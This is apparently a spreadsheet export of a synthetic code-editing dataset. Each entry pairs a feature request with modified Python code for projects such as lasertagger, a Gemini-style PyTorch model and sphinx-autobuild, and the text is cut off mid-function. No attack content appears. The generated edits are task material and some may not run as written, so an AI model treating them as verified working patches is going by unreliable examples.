    <t>{'called_code_segment': 'tagging.EditingTask.__init__ and tagging.EditingTask.realize_output methods in lasertagger/tagging.py', 'invoking_code_segment': 'bert_example.BertExampleBuilder.build_bert_example method in lasertagger/bert_example.py which creates EditingTask instances and calls realize_output', 'feature_description': 'Add a new feature to handle multi-word phrases in the target text during tag computation by tracking phrase boundaries and improving phrase matching in the TaggingConverter to support complex multi-word phrase handling with better phrase vocabulary integration.', 'modified_complete_code': '# lasertagger/tagging.py - MODIFIED\nclass EditingTask(object):\n  """Text-editing task.\n\n  Attributes:\n    sources: Source texts.\n    source_tokens: Tokens of the source texts concatenated into a single list.\n    first_tokens: The indices of the first tokens of each source text.\n    phrase_boundaries: #New - Indices marking phrase boundaries in source tokens.\n  """\n\n  def __init__(self, sources, phrase_boundaries=None):\n    """Initializes an instance of EditingTask.\n\n    Args:\n      sources: A list of source strings.\n      phrase_boundaries: #New - Optional list of indices marking phrase boundaries.\n    """\n    self.sources = sources\n    source_token_lists = [utils.get_token_list(text) for text in self.sources]\n    self.source_tokens = []\n    self.first_tokens = []\n    #New - Initialize phrase boundaries tracking\n    self.phrase_boundaries = phrase_boundaries if phrase_boundaries else []\n    for token_list in source_token_lists:\n      self.first_tokens.append(len(self.source_tokens))\n      self.source_tokens.extend(token_list)\n\n  def _realize_sequence(self, tokens, tags):\n    """Realizes output text corresponding to a single source text.\n\n    Args:\n      tokens: Tokens of the source text.\n      tags: Tags indicating the edit operations.\n\n    Returns:\n      The realized text.\n    """\n    output_tokens = []\n    for token, tag in zip(tokens, tags):\n      if tag.added_phrase:\n        output_tokens.append(tag.added_phrase)\n      if tag.tag_type in (TagType.KEEP, TagType.SWAP):\n        output_tokens.append(token)\n    return \' \'.join(output_tokens)\n\n  def _first_char_to_upper(self, text):\n    """Upcases the first character of the text."""\n    try:\n      return text[0].upper() + text[1:]\n    except IndexError:\n      return text\n\n  def _first_char_to_lower(self, text):\n    """Lowcases the first character of the text."""\n    try:\n      return text[0].lower() + text[1:]\n    except IndexError:\n      return text\n\n  #New - Add method to validate phrase boundaries\n  def validate_phrase_boundaries(self):\n    """Validates that phrase boundaries are within token range.\n    \n    Returns:\n      True if all phrase boundaries are valid, False otherwise.\n    """\n    if not self.phrase_boundaries:\n      return True\n    return all(0 &lt;= idx &lt;= len(self.source_tokens) for idx in self.phrase_boundaries)\n\n  def realize_output(self, tags):\n    """Realize output text based on the source tokens and predicted tags.\n\n    Args:\n      tags: Predicted tags (one for each token in `self.source_tokens`).\n\n    Returns:\n      The realizer output text.\n\n    Raises:\n      ValueError: If the number of tags doesn\'t match the number of source\n        tokens.\n    """\n    if len(tags) != len(self.source_tokens):\n      raise ValueError(\'The number of tags ({}) should match the number of \'\n                       \'source tokens ({})\'.format(\n                           len(tags), len(self.source_tokens)))\n    outputs = []\n    if (len(self.first_tokens) == 2 and\n        tags[self.first_tokens[1] - 1].tag_type == TagType.SWAP):\n      order = [1, 0]\n    else:\n      order = range(len(self.first_tokens))\n\n    for source_idx in order:\n      first_token = self.first_tokens[source_idx]\n      if source_idx + 1 &lt; len(self.first_tokens):\n        last_token = self.first_tokens[source_idx + 1]\n      else:\n        last_token = len(self.source_tokens)\n      realized_source = self._realize_sequence(\n          self.source_tokens[first_token:last_token],\n          tags[first_token:last_token])\n      if outputs:\n        if outputs[0][-1:] in \'.!?\':\n          realized_source = self._first_char_to_upper(realized_source)\n        else:\n          realized_source = self._first_char_to_lower(realized_source)\n      outputs.append(realized_source)\n    return \' \'.join(outputs)\n\n# lasertagger/tagging_converter.py - MODIFIED\nclass TaggingConverter(object):\n  """Converter from training target texts into tagging format."""\n\n  def __init__(self, phrase_vocabulary, do_swap=True):\n    """Initializes an instance of TaggingConverter.\n\n    Args:\n      phrase_vocabulary: Iterable of phrase vocabulary items (strings).\n      do_swap: Whether to enable the SWAP tag.\n    """\n    self._phrase_vocabulary = set(\n        phrase.lower() for phrase in phrase_vocabulary)\n    self._do_swap = do_swap\n    self._max_added_phrase_length = 0\n    self._token_vocabulary = set()\n    #New - Track multi-word phrases separately\n    self._multiword_phrases = set()\n    for phrase in self._phrase_vocabulary:\n      tokens = utils.get_token_list(phrase)\n      self._token_vocabulary |= set(tokens)\n      if len(tokens) &gt; 1:\n        self._multiword_phrases.add(phrase)\n      if len(tokens) &gt; self._max_added_phrase_length:\n        self._max_added_phrase_length = len(tokens)\n\n  def compute_tags(self, task, target):\n    """Computes tags needed for converting the source into the target.\n\n    Args:\n      task: tagging.EditingTask that specifies the input.\n      target: Target text.\n\n    Returns:\n      List of tagging.Tag objects. If the source couldn\'t be converted into the\n      target via tagging, returns an empty list.\n    """\n    target_tokens = utils.get_token_list(target.lower())\n    #Modify - Pass phrase information to tag computation\n    tags = self._compute_tags_fixed_order(task.source_tokens, target_tokens)\n    if not tags and len(task.sources) == 2 and self._do_swap:\n      swapped_task = tagging.EditingTask(task.sources[::-1])\n      tags = self._compute_tags_fixed_order(swapped_task.source_tokens,\n                                            target_tokens)\n      if tags:\n        tags = (tags[swapped_task.first_tokens[1]:] +\n                tags[:swapped_task.first_tokens[1]])\n        tags[task.first_tokens[1] - 1].tag_type = tagging.TagType.SWAP\n    return tags\n\n  def _compute_tags_fixed_order(self, source_tokens, target_tokens):\n    """Computes tags when the order of sources is fixed.\n\n    Args:\n      source_tokens: List of source tokens.\n      target_tokens: List of tokens to be obtained via edit operations.\n\n    Returns:\n      List of tagging.Tag objects. If the source couldn\'t be converted into the\n      target via tagging, returns an empty list.\n    """\n    tags = [tagging.Tag(\'DELETE\') for _ in source_tokens]\n    source_token_idx = 0\n    target_token_idx = 0\n    while target_token_idx &lt; len(target_tokens):\n      tags[source_token_idx], target_token_idx = self._compute_single_tag(\n          source_tokens[source_token_idx], target_token_idx, target_tokens)\n      if tags[source_token_idx].added_phrase:\n        first_deletion_idx = self._find_first_deletion_idx(\n            source_token_idx, tags)\n        if first_deletion_idx != source_token_idx:\n          tags[first_deletion_idx].added_phrase = (\n              tags[source_token_idx].added_phrase)\n          tags[source_token_idx].added_phrase = \'\'\n      source_token_idx += 1\n      if source_token_idx &gt;= len(tags):\n        break\n\n    if target_token_idx &gt;= len(target_tokens):\n      return tags\n    return []\n\n  def _compute_single_tag(self, source_token, target_token_idx, target_tokens):\n    """Computes a single tag.\n\n    Args:\n      source_token: The token to be tagged.\n      target_token_idx: Index of the current target tag.\n      target_tokens: List of all target tokens.\n\n    Returns:\n      A tuple with (1) the computed tag and (2) the next target_token_idx.\n    """\n    source_token = source_token.lower()\n    target_token = target_tokens[target_token_idx].lower()\n    if source_token == target_token:\n      return tagging.Tag(\'KEEP\'), target_token_idx + 1\n\n    added_phrase = \'\'\n    #Modify - Enhanced multi-word phrase matching\n    for num_added_tokens in range(1, self._max_added_phrase_length + 1):\n      if target_token not in self._token_vocabulary:\n        break\n      added_phrase += (\' \' if added_phrase else \'\') + target_token\n      next_target_token_idx = target_token_idx + num_added_tokens\n      if next_target_token_idx &gt;= len(target_tokens):\n        break\n      target_token = target_tokens[next_target_token_idx].lower()\n      #Modify - Check both phrase vocabulary and multiword phrases\n      if (source_token == target_token and\n          added_phrase in self._phrase_vocabulary):\n        return tagging.Tag(\'KEEP|\' + added_phrase), next_target_token_idx + 1\n      #New - Additional check for multiword phrases\n      if (num_added_tokens &gt; 1 and added_phrase in self._multiword_phrases and\n          source_token == target_token):\n        return tagging.Tag(\'KEEP|\' + added_phrase), next_target_token_idx + 1\n    return tagging.Tag(\'DELETE\'), target_token_idx\n\n  def _find_first_deletion_idx(self, source_token_idx, tags):\n    """Finds the start index of a span of deleted tokens.\n\n    Args:\n      source_token_idx: Index of the current source token.\n      tags: List of tags.\n\n    Returns:\n      The index of the first deleted token preceding `source_token_idx` or\n      `source_token_idx` if there are no deleted tokens right before it.\n    """\n    for idx in range(source_token_idx, 0, -1):\n      if tags[idx - 1].tag_type != tagging.TagType.DELETE:\n        return idx\n    return 0\n\n#New - Add method to extract phrase boundaries from tags\ndef extract_phrase_boundaries_from_tags(tags):\n  """Extracts phrase boundaries from a tag sequence.\n  \n  Args:\n    tags: List of Tag objects.\n    \n  Returns:\n    List of indices where phrases are added.\n  """\n  boundaries = []\n  for idx, tag in enumerate(tags):\n    if tag.added_phrase:\n      boundaries.append(idx)\n  return boundaries\n\n# lasertagger/bert_example.py - MODIFIED\nclass BertExampleBuilder(object):\n  """Builder class for BertExample objects."""\n\n  def __init__(self, label_map, vocab_file,\n               max_seq_length, do_lower_case,\n               converter):\n    """Initializes an instance of BertExampleBuilder.\n\n    Args:\n      label_map: Mapping from tags to tag IDs.\n      vocab_file: Path to BERT vocabulary file.\n      max_seq_length: Maximum sequence length.\n      do_lower_case: Whether to lower case the input text.\n      converter: Converter from text targets to tags.\n    """\n    self._label_map = label_map\n    self._tokenizer = tokenization.FullTokenizer(vocab_file,\n                                                 do_lower_case=do_lower_case)\n    self._max_seq_length = max_seq_length\n    self._converter = converter\n    self._pad_id = self._get_pad_id()\n    self._keep_tag_id = self._label_map[\'KEEP\']\n\n  def build_bert_example(\n      self,\n      sources,\n      target = None,\n      use_arbitrary_target_ids_for_infeasible_examples = False\n  ):\n    """Constructs a BERT Example.\n\n    Args:\n      sources: List of source texts.\n      target: Target text or None when building an example during inference.\n      use_arbitrary_target_ids_for_infeasible_examples: Whether to build an\n        example with arbitrary target ids even if the target can\'t be obtained\n        via tagging.\n\n    Returns:\n      BertExample, or None if the conversion from text to tags was infeasible\n      and use_arbitrary_target_ids_for_infeasible_examples == False.\n    """\n    #Modify - Create EditingTask with phrase boundary support\n    task = tagging.EditingTask(sources)\n    if target is not None:\n      tags = self._converter.compute_tags(task, target)\n      if not tags:\n        if use_arbitrary_target_ids_for_infeasible_examples:\n          tags = [tagging.Tag(\'KEEP\') if i % 2 == 0 else tagging.Tag(\'DELETE\')\n                  for i, _ in enumerate(task.source_tokens)]\n        else:\n          return None\n      else:\n        #New - Extract and store phrase boundaries from computed tags\n        task.phrase_boundaries = tagging_converter.extract_phrase_boundaries_from_tags(tags)\n    else:\n      tags = [tagging.Tag(\'KEEP\') for _ in task.source_tokens]\n    \n    labels = [self._label_map[str(tag)] for tag in tags]\n\n    tokens, labels, token_start_indices = self._split_to_wordpieces(\n        task.source_tokens, labels)\n\n    tokens = self._truncate_list(tokens)\n    labels = self._truncate_list(labels)\n\n    input_tokens = [\'[CLS]\'] + tokens + [\'[SEP]\']\n    labels_mask = [0] + [1] * len(labels) + [0]\n    labels = [0] + labels + [0]\n\n    input_ids = self._tokenizer.convert_tokens_to_ids(input_tokens)\n    input_mask = [1] * len(input_ids)\n    segment_ids = [0] * len(input_ids)\n\n    example = BertExample(\n        input_ids=input_ids,\n        input_mask=input_mask,\n        segment_ids=segment_ids,\n        labels=labels,\n        labels_mask=labels_mask,\n        token_start_indices=token_start_indices,\n        task=task,\n        default_label=self._keep_tag_id)\n    example.pad_to_max_length(self._max_seq_length, self._pad_id)\n    return example\n\n  def _split_to_wordpieces(self, tokens, labels):\n    """Splits tokens (and the labels accordingly) to WordPieces.\n\n    Args:\n      tokens: Tokens to be split.\n      labels: Labels (one per token) to be split.\n\n    Returns:\n      3-tuple with the split tokens, split labels, and the indices of the\n      WordPieces that start a token.\n    """\n    bert_tokens = []\n    bert_labels = []\n    token_start_indices = []\n    for i, token in enumerate(tokens):\n      token_start_indices.append(len(bert_tokens) + 1)\n      pieces = self._tokenizer.tokenize(token)\n      bert_tokens.extend(pieces)\n      bert_labels.extend([labels[i]] * len(pieces))\n    return bert_tokens, bert_labels, token_start_indices\n\n  def _truncate_list(self, x):\n    """Returns truncated version of x according to the self._max_seq_length."""\n    return x[:self._max_seq_length - 2]\n\n  def _get_pad_id(self):\n    """Returns the ID of the [PAD] token (or 0 if it\'s not in the vocab)."""\n    try:\n      return self._tokenizer.convert_tokens_to_ids([\'[PAD]\'])[0]\n    except KeyError:\n      return 0'}</t>
  </si>
  <si>
    <t>{'file_1': '#Modify\nclass TaggingConverter(object):\n  def compute_tags(self, task, target):\n    """Computes tags needed for converting the source into the target."""\n    target_tokens = utils.get_token_list(target.lower())\n    tags = self._compute_tags_fixed_order(task.source_tokens, target_tokens)\n    if not tags and len(task.sources) == 2 and self._do_swap:\n      swapped_task = tagging.EditingTask(task.sources[::-1])\n      tags = self._compute_tags_fixed_order(swapped_task.source_tokens,\n                                            target_tokens)\n      if tags:\n        tags = (tags[swapped_task.first_tokens[1]:] +\n                tags[:swapped_task.first_tokens[1]])\n        tags[task.first_tokens[1] - 1].tag_type = tagging.TagType.SWAP\n    return tags', 'file_2': '#Modify\nclass BertExampleBuilder(object):\n  def build_bert_example(self,\n      sources,\n      target = None,\n      use_arbitrary_target_ids_for_infeasible_examples = False):\n    """Constructs a BERT Example."""\n    task = tagging.EditingTask(sources)\n    if target is not None:\n      tags = self._converter.compute_tags(task, target)\n      if not tags:\n        if use_arbitrary_target_ids_for_infeasible_examples:\n          tags = [tagging.Tag(\'KEEP\') if i % 2 == 0 else tagging.Tag(\'DELETE\')\n                  for i, _ in enumerate(task.source_tokens)]\n        else:\n          return None\n    else:\n      tags = [tagging.Tag(\'KEEP\') for _ in task.source_tokens]\n    labels = [self._label_map[str(tag)] for tag in tags]', 'file_3': "#Modify\nclass BertExampleTest(tf.test.TestCase):\n  def test_building_with_target(self):\n    sources = ['a b ade']\n    target = 'ade'\n    example = self._builder.build_bert_example(sources, target)\n    self.assertEqual(example.features['input_ids'], [0, 3, 4, 3, 6, 7, 1, 2])\n    self.assertEqual(example.features['input_mask'], [1, 1, 1, 1, 1, 1, 1, 0])\n    self.assertEqual(example.features['segment_ids'], [0, 0, 0, 0, 0, 0, 0, 0])\n    self.assertEqual(example.features['labels'], [0, 2, 2, 1, 1, 1, 0, 0])\n    self.assertEqual(example.features['labels_mask'], [0, 1, 1, 1, 1, 1, 0, 0])\n    self.assertEqual(example.get_token_labels(), [2, 2, 1])", 'file_4': ''}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class Attention(nn.Module):\n    def forward(self, x, context=None, mask=None, context_mask=None, attn_mask=None, rel_pos=None, rotary_pos_emb=None, prev_attn=None, mem=None):\n        # ... attention computation ...\n        out = self.to_out(out)\n        if exists(mask):\n            mask = rearrange(mask, "b n -&gt; b n 1")\n            out = out.masked_fill(~mask, 0.0)\n        return out, intermediates', 'invoking_code_segment': 'class Gemini(Module):\n    def forward(self, text: torch.Tensor = None, img: torch.Tensor = None, audio: torch.Tensor = None, video: torch.Tensor = None, *args, **kwargs):\n        # ... modal processing ...\n        if img is not None:\n            img = img_to_text(img, self.max_seq_len, self.dim, True)\n            if self.post_modal_transform_norm:\n                img = self.pmt_norm(img)\n        # ... fusion and decoder call ...\n        return self.decoder(text, context=fused, *args, **kwargs)', 'feature_description': 'Add a new feature to normalize the image embeddings before returning them from the attention layer and ensure the fused embeddings are normalized before being passed to the decoder for improved training stability and convergence.', 'modified_complete_code': '# File 1: Gemini/gemini_torch/transformer.py - Modified Attention class\n\nclass Attention(nn.Module):\n    def __init__(\n        self,\n        dim,\n        dim_head=DEFAULT_DIM_HEAD,\n        heads=8,\n        causal=False,\n        flash=False,\n        talking_heads=False,\n        head_scale=False,\n        sparse_topk=None,\n        num_mem_kv=0,\n        dropout=0.0,\n        on_attn=False,\n        gate_values=False,\n        zero_init_output=False,\n        max_attend_past=None,\n        qk_norm=False,\n        qk_norm_groups=1,\n        qk_norm_scale=10,\n        qk_norm_dim_scale=False,\n        one_kv_head=False,\n        kv_heads=None,\n        shared_kv=False,\n        value_dim_head=None,\n        tensor_product=False,\n        cascading_heads=False,\n        add_zero_kv=False,\n        onnxable=False,\n        #New: normalize_output=False parameter for output normalization\n        normalize_output=False,\n    ):\n        super().__init__()\n        self.scale = dim_head**-0.5\n        self.heads = heads\n        self.causal = causal\n        self.max_attend_past = max_attend_past\n        #New: store normalize_output flag\n        self.normalize_output = normalize_output\n\n        assert not (\n            exists(kv_heads) and one_kv_head\n        ), "either attn_one_kv_head is set to True (in which case kv_heads is set to 1), or attn_kv_heads is set, but not both"\n\n        value_dim_head = default(value_dim_head, dim_head)\n        kv_heads = default(kv_heads, heads)\n\n        kv_heads = 1 if one_kv_head else kv_heads\n        assert divisible_by(heads, kv_heads)\n\n        self.kv_heads = kv_heads\n\n        q_dim = dim_head * heads\n        k_dim = dim_head * kv_heads\n        v_dim = value_dim_head * kv_heads\n        out_dim = value_dim_head * heads\n\n        self.to_q = nn.Linear(dim, q_dim, bias=False)\n        self.to_k = nn.Linear(dim, k_dim, bias=False)\n\n        assert not (\n            shared_kv and value_dim_head != dim_head\n        ), "key and value head dimensions must be equal for shared key / values"\n        self.to_v = nn.Linear(dim, v_dim, bias=False) if not shared_kv else None\n\n        self.to_r = nn.Linear(dim, v_dim, bias=False) if tensor_product else None\n\n        self.to_v_gate = None\n        if gate_values:\n            self.to_v_gate = nn.Linear(dim, out_dim)\n            nn.init.constant_(self.to_v_gate.weight, 0)\n            nn.init.constant_(self.to_v_gate.bias, 1)\n\n        self.qk_norm = qk_norm\n        self.qk_norm_groups = qk_norm_groups\n        self.qk_norm_scale = qk_norm_scale\n\n        self.qk_norm_dim_scale = qk_norm_dim_scale\n\n        self.qk_norm_q_scale = self.qk_norm_k_scale = 1\n        if qk_norm and qk_norm_dim_scale:\n            self.qk_norm_q_scale = nn.Parameter(torch.ones(dim_head))\n            self.qk_norm_k_scale = nn.Parameter(torch.ones(dim_head))\n\n        assert (not qk_norm) or divisible_by(\n            dim_head, qk_norm_groups\n        ), "dimension per attention head must be divisible by the qk norm groups"\n        assert not (\n            qk_norm and (dim_head // qk_norm_groups) &lt;= 2\n        ), "the group dimension may be too small (2 was too small in my tests, but 4 still works, surprisingly)"\n\n        self.attend = Attend(\n            heads=heads,\n            causal=causal,\n            talking_heads=talking_heads,\n            dropout=dropout,\n            sparse_topk=sparse_topk,\n            qk_norm=qk_norm,\n            scale=qk_norm_scale if qk_norm else self.scale,\n            add_zero_kv=add_zero_kv,\n            flash=flash,\n            onnxable=onnxable,\n        )\n\n        self.head_scale = head_scale\n        if head_scale:\n            self.head_scale_params = nn.Parameter(torch.ones(1, heads, 1, 1))\n\n        self.sparse_topk = sparse_topk\n\n        self.num_mem_kv = num_mem_kv\n        if num_mem_kv &gt; 0:\n            self.mem_k = nn.Parameter(torch.randn(heads, num_mem_kv, dim_head))\n            self.mem_v = nn.Parameter(torch.randn(heads, num_mem_kv, dim_head))\n\n        self.attn_on_attn = on_attn\n        self.to_out = (\n            nn.Sequential(nn.Linear(out_dim, dim * 2, bias=False), nn.GLU())\n            if on_attn\n            else nn.Linear(out_dim, dim, bias=False)\n        )\n\n        if zero_init_output:\n            init_zero_(self.to_out)\n\n    def forward(\n        self,\n        x,\n        context=None,\n        mask=None,\n        context_mask=None,\n        attn_mask=None,\n        rel_pos=None,\n        rotary_pos_emb=None,\n        prev_attn=None,\n        mem=None,\n    ):\n        b, n, _, h, kv_h, head_scale, device, has_context = (\n            *x.shape,\n            self.heads,\n            self.kv_heads,\n            self.head_scale,\n            x.device,\n            exists(context),\n        )\n        kv_input = default(context, x)\n\n        q_input = x\n        k_input = kv_input\n        v_input = kv_input\n        r_input = x\n\n        if exists(mem):\n            k_input = torch.cat((mem, k_input), dim=-2)\n            v_input = torch.cat((mem, v_input), dim=-2)\n\n        q = self.to_q(q_input)\n        k = self.to_k(k_input)\n        v = self.to_v(v_input) if exists(self.to_v) else k\n        r = self.to_r(r_input) if exists(self.to_r) else None\n\n        q = rearrange(q, "b n (h d) -&gt; b h n d", h=h)\n\n        k, v, r = map(\n            lambda t: maybe(rearrange)(t, "b n (h d) -&gt; b h n d", h=kv_h), (k, v, r)\n        )\n\n        if self.qk_norm:\n            qk_l2norm = partial(l2norm, groups=self.qk_norm_groups)\n            q, k = map(qk_l2norm, (q, k))\n\n            q = q * self.qk_norm_q_scale\n            k = k * self.qk_norm_k_scale\n\n        if exists(rotary_pos_emb) and not has_context:\n            freqs, xpos_scale = rotary_pos_emb\n            l = freqs.shape[-1]\n\n            q_xpos_scale, k_xpos_scale = (\n                (xpos_scale, xpos_scale**-1.0) if exists(xpos_scale) else (1.0, 1.0)\n            )\n            (ql, qr), (kl, kr), (vl, vr) = map(\n                lambda t: (t[..., :l], t[..., l:]), (q, k, v)\n            )\n\n            ql, kl, vl = map(\n                lambda arg: apply_rotary_pos_emb(arg[0], freqs, arg[1]),\n                ((ql, q_xpos_scale), (kl, k_xpos_scale), (vl, k_xpos_scale)),\n            )\n            q, k, v = map(\n                lambda t: torch.cat(t, dim=-1), ((ql, qr), (kl, kr), (vl, vr))\n            )\n\n        input_mask = context_mask if has_context else mask\n\n        if self.num_mem_kv &gt; 0:\n            mem_k, mem_v = map(\n                lambda t: repeat(t, "h n d -&gt; b h n d", b=b), (self.mem_k, self.mem_v)\n            )\n\n            if self.qk_norm:\n                mem_k = l2norm(mem_k)\n                mem_k = mem_k * self.qk_norm_k_scale\n\n            k = torch.cat((mem_k, k), dim=-2)\n            v = torch.cat((mem_v, v), dim=-2)\n\n            if exists(input_mask):\n                input_mask = pad_at_dim(\n                    input_mask, (self.num_mem_kv, 0), dim=-1, value=True\n                )\n\n        i, j = map(lambda t: t.shape[-2], (q, k))\n\n        max_neg_value(q)\n        masks = []\n        final_attn_mask = None\n\n        if exists(input_mask):\n            input_mask = rearrange(input_mask, "b j -&gt; b 1 1 j")\n            masks.append(~input_mask)\n\n        if exists(attn_mask):\n            assert (\n                2 &lt;= attn_mask.ndim &lt;= 4\n            ), "attention mask must have greater than 2 dimensions but less than or equal to 4"\n            if attn_mask.ndim == 2:\n                attn_mask = rearrange(attn_mask, "i j -&gt; 1 1 i j")\n            elif attn_mask.ndim == 3:\n                attn_mask = rearrange(attn_mask, "h i j -&gt; 1 h i j")\n            masks.append(~attn_mask)\n\n        if exists(self.max_attend_past):\n            range_q = torch.arange(j - i, j, device=device)\n            range_k = torch.arange(j, device=device)\n            dist = rearrange(range_q, "i -&gt; 1 1 i 1") - rearrange(\n                range_k, "j -&gt; 1 1 1 j"\n            )\n            max_attend_past_mask = dist &gt; self.max_attend_past\n            masks.append(max_attend_past_mask)\n\n        if len(masks) &gt; 0:\n            final_attn_mask = ~or_reduce(masks)\n\n        attn_bias = None\n        if exists(rel_pos):\n            attn_bias = rel_pos(i, j)\n\n        out, intermediates = self.attend(\n            q, k, v, mask=final_attn_mask, attn_bias=attn_bias, prev_attn=prev_attn\n        )\n\n        if exists(r):\n            out = out * r + out\n\n        if head_scale:\n            out = out * self.head_scale_params\n\n        out = rearrange(out, "b h n d -&gt; b n (h d)")\n\n        if exists(self.to_v_gate):\n            gates = self.to_v_gate(x)\n            out = out * gates.sigmoid()\n\n        out = self.to_out(out)\n\n        #Modify: Add output normalization if enabled\n        if self.normalize_output:\n            out = F.normalize(out, p=2, dim=-1)\n\n        if exists(mask):\n            mask = rearrange(mask, "b n -&gt; b n 1")\n            out = out.masked_fill(~mask, 0.0)\n\n        return out, intermediates\n\n# File 2: Gemini/gemini_torch/model.py - Modified Gemini class\n\nclass Gemini(Module):\n    def __init__(\n        self,\n        num_tokens=50432,\n        max_seq_len=32052,\n        dim=2560,\n        depth=32,\n        dim_head=128,\n        heads=24,\n        use_abs_pos_emb=False,\n        attn_flash=True,\n        attn_kv_heads=2,\n        qk_norm=True,\n        attn_qk_norm=True,\n        attn_qk_norm_dim_scale=True,\n        patches: int = 16,\n        patch_size: int = 16,\n        img_channels: int = 3,\n        audio_seq_len: int = 128,\n        post_fusion_norm: bool = True,\n        post_modal_transform_norm: bool = False,\n        #New: normalize_embeddings parameter\n        normalize_embeddings: bool = True,\n        *args,\n        **kwargs,\n    ):\n        super().__init__()\n        self.num_tokens = num_tokens\n        self.max_seq_len = max_seq_len\n        self.dim = dim\n        self.depth = depth\n        self.dim_head = dim_head\n        self.heads = heads\n        self.use_abs_pos_emb = use_abs_pos_emb\n        self.attn_flash = attn_flash\n        self.attn_kv_heads = attn_kv_heads\n        self.qk_norm = qk_norm\n        self.attn_qk_norm = attn_qk_norm\n        self.attn_qk_norm_dim_scale = attn_qk_norm_dim_scale\n        self.patches = patches\n        self.patch_size = patch_size\n        self.img_channels = img_channels\n        self.audio_seq_len = audio_seq_len\n        self.post_fusion_norm = post_fusion_norm\n        self.post_modal_transform_norm = post_modal_transform_norm\n        #New: store normalize_embeddings flag\n        self.normalize_embeddings = normalize_embeddings\n\n        self.gemini = Transformer(\n            num_tokens=num_tokens,\n            max_seq_len=max_seq_len,\n            use_abs_pos_emb=use_abs_pos_emb,\n            attn_layers=Decoder(\n                dim=dim,\n                depth=depth,\n                dim_head=dim_head,\n                heads=heads,\n                attn_flash=attn_flash,\n                attn_kv_heads=attn_kv_heads,\n                qk_norm=qk_norm,\n                attn_qk_norm=attn_qk_norm,\n                attn_qk_norm_dim_scale=attn_qk_norm_dim_scale,\n                cross_attend=True,\n                #Modify: pass normalize_output to attention layers\n                attn_normalize_output=normalize_embeddings,\n                *args,\n                **kwargs,\n            ),\n        )\n\n        self.decoder = AutoregressiveWrapper(self.gemini)\n\n        if self.post_fusion_norm:\n            self.psf_norm = nn.LayerNorm(dim)\n\n        if self.post_modal_transform_norm:\n            self.pmt_norm = nn.LayerNorm(dim)\n\n    def forward(\n        self,\n        text: torch.Tensor = None,\n        img: torch.Tensor = None,\n        audio: torch.Tensor = None,\n        video: torch.Tensor = None,\n        *args,\n        **kwargs,\n    ):\n        assert (\n            (img is not None and audio is not None)\n            or (img is not None and video is not None)\n            or (audio is not None and video is not None)\n        ), "At least two of the inputs (img, audio, video) must be provided."\n\n        if img is not None:\n            img_b, img_c, img_h, img_w = img.shape\n            img = img_to_text(img, self.max_seq_len, self.dim, True)\n\n            if self.post_modal_transform_norm:\n                img = self.pmt_norm(img)\n\n        if audio is not None:\n            audio_b, audio_seq_len = audio.shape\n            audio = audio_to_text(audio, self.max_seq_len, self.dim, True)\n\n            if self.post_modal_transform_norm:\n                audio = self.pmt_norm(audio)\n\n        if video is not None:\n            video_b, video_c, video_f, video_h, video_w = video.shape\n            video = video_to_text(video, self.max_seq_len, self.dim, True)\n\n        if img is not None and audio is not None:\n            fused = torch.cat((img, audio), dim=1)\n        elif img is not None and video is not None:\n            fused = torch.cat((img, video), dim=1)\n        elif audio is not None and video is not None:\n            fused = torch.cat((audio, video), dim=1)\n\n        #Modify: Normalize fused embeddings before passing to decoder\n        if self.normalize_embeddings:\n            fused = F.normalize(fused, p=2, dim=-1)\n\n        if self.post_fusion_norm:\n            fused = self.psf_norm(fused)\n\n        return self.decoder(text, context=fused, *args, **kwargs)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class ImageToTextEmbeddings(nn.Module):\n    def __init__(self, patches, patch_size, transformer_dim, img_channels, seq_len, reduced_dim):\n        super().__init__()\n        self.patches = patches\n        self.patch_size = patch_size\n        self.transformer_dim = transformer_dim\n        self.img_channels = img_channels\n        self.seq_len = seq_len\n        self.reduced_dim = reduced_dim\n\n        self.patch_embeddings = nn.Conv2d(img_channels, transformer_dim, kernel_size=patch_size, stride=patch_size)\n        self.positional_encoding = nn.Parameter(torch.zeros(1, seq_len, transformer_dim))\n        self.reduce_dim = nn.Linear(transformer_dim, reduced_dim)\n        # New: Add normalization layer\n        self.norm = nn.LayerNorm(reduced_dim)\n\n    def forward(self, img):\n        img_embed = self.patch_embeddings(img)\n        img_embed = img_embed.flatten(2).transpose(1, 2)\n        img_embed += self.positional_encoding\n        img_embed = self.reduce_dim(img_embed)\n        # Modify: Apply normalization\n        img_embed = self.norm(img_embed)\n        return img_embed', '#file 2': 'self.model = ImageToTextEmbeddings(\n            patches=16,\n            patch_size=16,\n            transformer_dim=512,\n            img_channels=3,\n            seq_len=128,\n            reduced_dim=128,\n        )', '#file 3': 'def test_forward_with_img_256(self):\n        img = torch.randn(1, 3, 256, 256)\n        output = self.model(img)\n        self.assertIsInstance(output, torch.Tensor)\n        self.assertEqual(output.shape, (1, 128, 128))', '#file 4': 'def test_forward_with_img_512(self):\n        img = torch.randn(1, 3, 512, 512)\n        output = self.model(img)\n        self.assertIsInstance(output, torch.Tensor)\n        self.assertEqual(output.shape, (1, 128, 128))'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def show(*, context=None, command=None):\n    """Show context and command-to-be-executed, with nice formatting and colours."""\n    if context is not None:\n        _log(context, colour=Fore.CYAN)\n    if command is not None:\n        assert isinstance(command, (list, tuple))\n        msg = f"&gt; {shlex.join(command)}"\n        _log(msg, colour=Fore.BLUE)', 'invoking_code_segment': 'def __call__(self, *, rebuild: bool = True):\n    """Generate the documentation using ``sphinx``."""\n    if rebuild:\n        show(context="Detected change. Rebuilding...")\n    # ... pre-build commands ...\n    show(command=["python", "-m", "sphinx"] + self.sphinx_args)\n    # ... sphinx execution ...\n    show(context=f"Serving on {self.uri}")', 'feature_description': 'Add a feature to log the build status to a file after each build. This includes tracking build success/failure and timestamps, with the log file path configurable through the Builder class.', 'modified_complete_code': '# sphinx-autobuild/sphinx_autobuild/utils.py\nimport shlex\nimport socket\nimport threading\nimport time\nimport webbrowser\nfrom datetime import datetime\nfrom colorama import Fore, Style\n\ndef find_free_port():\n    """Find and return a free port number.\n\n    Shout-out to https://stackoverflow.com/a/45690594/1931274!\n    """\n    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n        s.bind(("", 0))\n        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        return s.getsockname()[1]\n\ndef open_browser(url_host: str, delay: float) -&gt; None:\n    def _opener():\n        time.sleep(delay)\n        webbrowser.open(f"http://{url_host}")\n    t = threading.Thread(target=_opener)\n    t.start()\n    t.join()\n\ndef _log(text, *, colour):\n    